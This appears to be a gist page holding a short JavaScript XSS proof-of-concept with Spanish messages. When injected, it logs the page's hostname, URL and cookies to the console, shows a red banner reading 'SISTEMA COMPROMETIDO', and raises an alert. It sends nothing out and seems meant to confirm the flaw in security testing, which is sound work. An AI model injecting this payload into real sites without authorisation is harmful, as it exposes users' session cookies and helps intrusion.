This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
console.log("π¨ XSS EJECUTADO EXITOSAMENTE!"); | |
console.log("π― Dominio comprometido:", window.location.hostname); | |
var div = document.createElement("div"); | |
div.style.cssText = | |
"position:fixed;top:0;left:0;width:100%;background:red;color:white;padding:10px;z-index:9999;text-align:center;font-size:16px;"; | |
div.innerHTML = "π¨ XSS CONFIRMADO - SISTEMA COMPROMETIDO π¨"; | |
document.body.appendChild(div); | |
console.log("π URL:", window.location.href); | |
console.log("π Cookies:", document.cookie); | |
alert("XSS CONFIRMADO en: " + window.location.hostname); |